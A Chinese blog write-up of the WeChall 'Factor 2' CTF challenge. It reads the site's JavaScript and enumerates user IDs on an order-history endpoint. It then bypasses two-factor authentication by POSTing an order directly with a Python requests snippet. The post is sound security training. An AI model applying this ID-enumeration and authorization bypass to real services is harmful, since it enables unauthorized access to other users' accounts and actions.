WeChall Factor2 - Write Up

最新推荐文章于 2024-09-19 11:46:31 发布
最新推荐文章于 2024-09-19 11:46:31 发布
阅读量287 收藏 1
点赞数
分类专栏: 记录 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alongname/article/details/109227936
版权

安全 经验分享

题干:

Factor 2

Hello hacker

 

We have outsourced an application to an indian programmer and got disappointed.

The application is not multi language capable as agreed, but the worst is...

One of our coworkers could completely circumvent the two-factor authentication within minutes.

Can you do this as well?

 

To prove your success you have to order a special article.

 

Good luck!

gizmore

首先进入链接,发现就是一个简单的登陆界面:

界面

右键,查看源代码,发现 factor2.js ,:

发现factor2.js

发现 factor2.js 里面是具体的逻辑实现代码:

"use strict";
/**
 * (c)2019 Failsoft
 */
window.gurroga = {};

window.gurroga.api = {
	login: '../backend/api/login.php',
	auth: '../backend/api/authenticate.php',
}

window.gurroga.USER = null;
window.gurroga.ARTICLES = null;

window.gurroga.init = function() {
	console.log('init()');
	window.jsGrid.locale("de");
};

window.gurroga.showMessage = function(message) {
	console.log('showMessage()', message);
	$('#successmessage').html(message);
	$('#successpopup').popup();
	$('#successpopup').popup("open");
};

window.gurroga.showError = function(errorMessage) {
	console.log('showError()', errorMessage);
	$('#errormessage').text(errorMessage);
	$('#errorpopup').popup();
	$('#errorpopup').popup("open");
};

window.gurroga.goto = function(page) {
	console.log('goto()', page);
	$.mobile.changePage(page);
};

window.gurroga.disable = function(selector) {
	var input = $(selector);
	input.prop('disabled', true)
	input.parent().addClass("ui-state-disabled");
};

window.gurroga.enable = function(selector) {
	var input = $(selector);
	input.prop('disabled', false)
	input.parent().removeClass("ui-state-disabled");
};

window.gurroga.login = function() {
	console.log('login()');
	if (window.gurroga.USER) {
		window.gurroga.authenticate();
	}
	else {
		var username = $('#username').val();
		var password = $('#password').val();
		var postData = {username: username, password: password};
		$.post(window.gurroga.api.login, postData)
		.done(function(result){
			console.log(result);
			window.gurroga.USER = result.user;
			window.gurroga.ARTICLES = result.artikel;
			$('.username').text(result.user.vorname + ' ' + result.user.nachname);
			window.gurroga.disable('#username');
			window.gurroga.disable('#password');
			window.gurroga.enable('#authtoken');
			window.gurroga.buildArticles(result.artikel);
		})
		.fail(function(result){
			console.error(result);
			window.gurroga.showError(result.responseJSON.message);
		});
	}
};

window.gurroga.logout = function() {
	console.log('logout()');
	window.gurroga.USER = null;
	window.gurroga.ARTICLES = null;
}

window.gurroga.authenticate = function() {
	console.log('authenticate()');
	var token = $('#authtoken').val();
	var postData = {user: window.gurroga.USER.id, token: token};
	$.post(window.gurroga.api.auth, postData)
	.done(function(result){
		console.log(result);
		window.gurroga.goto('#welcome');
	})
	.fail(function(result){
		console.error(result);
		window.gurroga.showError(result.responseJSON.message);
	});
};

window.gurroga.buildArticles = function(artikel) {
	console.log('buildArticles()', artikel);
	$('#bestellartikel').empty();
	for (var a in artikel) {
		var b = artikel[a];
		$('#bestellartikel').append($('<option />').text(b.title).val(b.id));
	}
};

$(window.document).on('pagechange', function(event, args) {
	var funcname = 'changeTo_'+args.toPage[0].id;
	console.log('pagechange()', funcname);
	var func = window.gurroga[funcname];
	if (func) {
		func();
	}
});

window.gurroga.changeTo_login = function() {
	console.log('changeTo_login()');
	window.gurroga.enable('#username');
	window.gurroga.enable('#password');
	window.gurroga.disable('#authtoken');
};


window.gurroga.changeTo_historie = function() {
	console.log('changeTo_historie()');
	$('#historygrid').jsGrid({
		width: '100%',
		sorting: true,
		paging: false,
		autoload: true,
		controller: {
			loadData: function() {
				var d = $.Deferred();
				$.ajax({
					url: "../backend/api/bestellhistorie.php?user="+window.gurroga.USER.id,
					dataType: "json"
				}).done(function(response) {
					d.resolve(response.result);
				});
				return d.promise();
			}
		},
		fields: [
			{name: "article.title", type: "text", title: "Artikel"},
			{name: "article.amt", type: "text", title: "St眉ckzahl"},
			{name: "amt", type: "text", title: "Bestellmenge"},
			{name: "ordered_at", type: "text", title: "Bestelldatum"},
			{name: "delivered_at", type: "text", title: "Lieferdatum"},
		]
  	});
}

window.gurroga.order = function() {
	console.log('order()');
	var article = $('#bestellartikel').val();
	var amount = $('#bestellmenge').val();
	var postData = {user: window.gurroga.USER.id, id: article, amt: amount};
	$.post('../backend/api/bestellen.php', postData)
	.done(function(result){
		console.log(result);
		window.gurroga.showMessage(result);
	})
	.fail(function(result){
		console.error(result);
		window.gurroga.showError(result.responseText);
	});
};

大致流程是用户通过用户名和密码进行登录,后端返回用户 id 和 article。

        var username = $('#username').val();
		var password = $('#password').val();
		var postData = {username: username, password: password};
		$.post(window.gurroga.api.login, postData)
		.done(function(result){
			console.log(result);
			window.gurroga.USER = result.user;
			window.gurroga.ARTICLES = result.artikel;
			$('.username').text(result.user.vorname + ' ' + result.user.nachname);
			window.gurroga.disable('#username');
			window.gurroga.disable('#password');
			window.gurroga.enable('#authtoken');
			window.gurroga.buildArticles(result.artikel);
		})

思路

1.观察到没有字符过滤,首先想到的是利用sql注入,行不通。(可能是太菜了)

2.一般网站都会采取cookies+session来作访问控制,然而没有在本题中看到相关操作。又观察到用户数据中的 user_id 多次被用到,因此猜测在本例中用户id是用户凭据,所以突破口可能在它身上。

解决

仔细审阅代码,发现order操作是通过传递用户id、文章id以及订阅数量直接操作的,如果能够知道这两个东西就直接能够解题了。

    window.gurroga.order = function() {
	console.log('order()');
	var article = $('#bestellartikel').val();
	var amount = $('#bestellmenge').val();
	var postData = {user: window.gurroga.USER.id, id: article, amt: amount};
	$.post('../backend/api/bestellen.php', postData)
	.done(function(result){
		console.log(result);
		window.gurroga.showMessage(result);
	})
	.fail(function(result){
		console.error(result);
		window.gurroga.showError(result.responseText);
	});

尝试随机取id直接post数据:

postdata = {
        'user': 1,
        'id': 1,
        'amt': 1
    }

得到:

<div>Vielen Dank für Ihre Bestellung!</div>

翻译:感谢您的订单!

经过多次尝试,得到的都是上面这个结果,此路不通。

再次审查factor2.js,发现还有一段与访问历史相关的api接口:

loadData: function() {
				var d = $.Deferred();
				$.ajax({
					url: "../backend/api/bestellhistorie.php?user="+window.gurroga.USER.id,
					dataType: "json"
				}).done(function(response) {
					d.resolve(response.result);
				});

也是通过用户id访问的,再次尝试构造url:

https://www.wechall.net/challenge/gizmore/factor2/backend/api/bestellhistorie.php?user=1

得到:

{
	"status": "success",
	"result": [{
		"article": {
			"id": 1,
			"name": "bueroklammern",
			"amt": 100,
			"title": "B\u00fcroklammern"
		},
		"amt": 1,
		"ordered_at": "2018-10-29",
		"delivered_at": "2018-10-30"
	}]
}

发现有搞头,返回了数据!既然有数据返回,说明我们猜的user id是存在的,而且上面的数据还返回了article的id。仔细查看所有id都是1,这不和之前猜的数据一摸一样吗。。。决定多试几个id,依次累加,当id取到5的时候,出现了问题,没有数据返回了。本着小心谨慎地态度,试了一下user=6:

{
	"status": "success",
	"result": [{
		"article": {
			"id": 1,
			"name": "bueroklammern",
			"amt": 100,
			"title": "B\u00fcroklammern"
		},
		"amt": 1,
		"ordered_at": "2018-10-30",
		"delivered_at": "2018-10-31"
	}, {
		"article": {
			"id": 5678363,
			"name": "solution",
			"amt": 1,
			"title": "Challenge solution for Factor 2"
		},
		"amt": 1,
		"ordered_at": "2018-11-01",
		"delivered_at": "2018-11-02"
	}]
}

这下发现了一个特殊的数据,名字直接是 solution 了,赶紧order!

url = 'http://www.wechall.net/challenge/gizmore/factor2/backend/api/bestellen.php'
    postdata = {
        'user': 6,
        'id': 5678363,
        'amt': 1
    }
    with requests.post(url=url, data=postdata) as response:
        print(response.text)

成功解决!再看题目的时候,发现原来题干里已经带了提示了:

To prove your success you have to order a special article.

小细节

<div class="gwf_messages">
	<span class="gwf_msg_t">WeChall</span>
		<ul>
		<li>Your answer is correct. To keep track of your progress you need to register.</li>

		</ul>
</div>
<div class="cl"></div>

PS:这里因为是直接post,没有带wechall的cookies,所以提示需要注册。只需要在post时带上cookies就行了。

如果发现有错误或者有更好的思路和方法,欢迎留言评论。

alongname
关注
专栏目录
Two-factor authentication (2FA) is required for your GitHub account解决方案
weixin_43178406的博客
01-27 4万+
 本文主要介绍了Two-factor authentication (2FA) is required for your GitHub account的解决方案,希望能对使用github的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
Two-factor authentication (2FA)
06-15 1433
用户输入用户名和密码后,网站还可以要求用户通过手机或者邮件接收并提交额外的验证码,从而进一步验证用户的身份。基本实现步骤如下: 1,在Controller的Login方法中,如果用户输入的用户名和密码正确,那么检查该用户是否enable了2FA. 2,如果是,那么调用SendCode(发送验证码)的Action. 在该Action中,可以先调用 GetValidTwoFactorProvidersAsync获取2FA的验证方式(比如邮件或者短信), 然后以列表形式让用户选择此次验证需要通过哪种方式,如下代码
WeChall:Training: Register Globals (Exploit, PHP, Training)
D.MIND 的博客
07-10 284
WeChall:Training: Register Globals (Exploit, PHP, Training) 这题所需的知识点是:register global—将所有提交的参数注册为全局变量,进而将某些变量的值覆盖为我们所需要的。更多参考PHP: Using Register Globals - Manual 从32行开始,有下面这段代码: 1. if (isset($login)) { echo GWF_HTML::message('Register Globals', $c
WeChall-writeup-2-11.10
Crystal_bing的博客
11-13 738
    是的,连着上一篇又发了这篇2333也是几天前攒的。我觉得在整个学习过程中,与同伴的交流还是很重要的,如果你的身边没有可以讨论的小伙伴,那就借助互联网的力量来进行思维的碰撞吧~我写的解法也不一定是唯一正确的,如果有更好的方式请来告诉我鸭!上正题。 Training: Programming 1 题目很明确,在链接种获得一个message,然后提交这个message。但是题目中给了限时,不可...
Wechall PHP Writeup
Bendawang's Blog
03-19 6556
Wechall PHP Writeup
WeChall刷题(一)
leeham的博客
08-14 8201
2017.08.14这两天开始刷ctf的题目,首先看了i春秋上边的ctf入门视频,了解到很多刷题网站,分享如下: http://pwdme.cc/tag/idf%E5%AE%9E%E9%AA%8C%E5%AE%A4/ https://microcorruption.com/login http://smashthestack.org/ http://overthewire.org/warga
WeChall-writeup-4-11.17(Register Globals;Baconian;LSB;Limited Access)
Crystal_bing的博客
11-17 702
今天有时间来更新新的writeup!刚刚写完的!     前两天在看《达芬奇密码》,所以做的题稍微少了一点~丹布朗是真的很厉害!宗教,密码和文学被他融合成了他独特的一种文风。对我来说真的极具吸引力。 Training: Register Globals 这一段是用来判断用户是否成功登陆的。第一个if中验证用户名和密码,如果匹配的话就set $ login;第二个if用来判断$ login是否被...
WeChall Training部分
Howie‘s Blog
11-09 1517
我的WeChall之旅??!Training: Get SourcedTraining: Stegano I (Training, Stegano)Training: Crypto - Caesar I (Crypto, Training)To be continued 记录以在wechall上完成的所有Challenges以便于以后学习查看,同时完成写blog的任务。 Training: Get...
从wireshark中学网络分析(二)
NK_test的博客
03-02 3769
在上一篇文章中提到了TCP的延迟确认,延迟确认并不一定能提高性能,在某些场景下,开启延迟确认甚至会严重降低网络传输性能。(一)下面列出几个开启延迟确认降低网络性能的场景:场景一:想象这样一个场景,服务端开启了延迟确认,客户端在同一时刻发送了9个TCP包,其中3、4、5号因为拥塞丢失了。那么传输过程中发生了以下事件: 到达服务器的6、7、8、9号包触发了4个“Ack 3”,于是客户端快速重传
R语言----Factor类型的变量
热门推荐
Gfqwy2021
04-02 1万+
factor类型的创建 factor( ) > credit_rating <- c("BB", "AAA", "AA", "CCC", "AA", "AAA", "B", "BB") #生成名为credit_rating的字符向量 > credit_factor <- factor(credit_rating) # step 2.将credit_rating转化为因...
网络攻防路-wechall
大紫明宫空离境
12-10 437
1Training: Get Sourced 查看网页源代码 2Training: Stegano 隐写术,下载图片,用工具打开。 3Crypto - Caesar 凯撒加密 4Training: WWW-Robots 查看网页robots http://www.wechall.net/robots.txt 5Training: ASCII ASCII...
谈谈Wechall几道题
T2hunz1
10-20 646
wechall几道题目解法的记录。
WeChall_Training: Register Globals
1stPeak's Blog
10-08 644
Training: Register Globals 中文翻译: 源码: <?php chdir('../../../../'); define('GWF_PAGE_TITLE', 'Training: Register Globals'); require_once('challenge/html_head.php'); if (false === ($chall = WC_Chall...
Wechall writeup By Assassin
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
【双语新闻】AGI安全与对齐,DeepMind近期工作
qq_29883477的博客
09-13 1078
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 495
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
【农信网-注册/登录安全分析报告】
09-16 1365
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
第160天:安全开发-Python-蓝队项目&流量攻击分析&文件动态监控&Webshell检测
最新发布
weixin_71529930的博客
09-19 283
本来后续上传的文件,可以调用api接口上传到威胁分析平台进行分析是否有害,根据分析返回的结果,来判断是否进行删除,但是百度免费的网站已经停掉了,virustotal免费的api坏掉了,别的免费的不好用,收费的买不起……首先先把tcp中传入的payload包,以一行一行的格式进行输出,因为http肯定是tcp层协议。通过写一个列表把最常见的字符串以byte格式写入,每一行进行循环,判断这段字符串是否在这一行中。该项目就不过多进行介绍了,这里被创建,删除也会提示修改,所以我只显示增加,删除,
multi-factor-master
08-01
multi-factor-master是一个复合因素筛选模型。在投资领域,为了降低风险,选择具有良好投资回报的资产是非常重要的。传统的单一指标筛选模型往往只考虑某个特定指标,忽略了其他重要因素的影响。而multi-factor-master则采用多个指标进行综合评估,以找到最合适的投资标的。 通过multi-factor-master模型,投资者可以在众多可能的投资标的中筛选出最具潜力的资产。该模型综合考虑了多个因素,如财务状况、行业前景、市场走势等,以保证选择的资产具备较高的盈利潜力。 与单一指标模型相比,multi-factor-master模型具有更高的可靠性和准确性。通过增加考虑因素,可以排除某个特定指标的局限性,从而获得更全面的信息。同时,该模型还可以通过调整不同因素的权重来满足不同投资者的偏好和风险承受能力。 值得注意的是,multi-factor-master模型不仅可以应用于股票投资,也可以用于其他金融市场的资产选择,如债券、期货等。该模型为投资者提供了一种辅助决策的工具,帮助他们更好地把握投资机会,降低风险。 总而言之,multi-factor-master是一种综合考虑多个因素的投资筛选模型,具有更高的可靠性和准确性。它能够帮助投资者选择具备较高潜力的资产,并提供辅助决策的工具。在投资领域中具有重要的应用价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值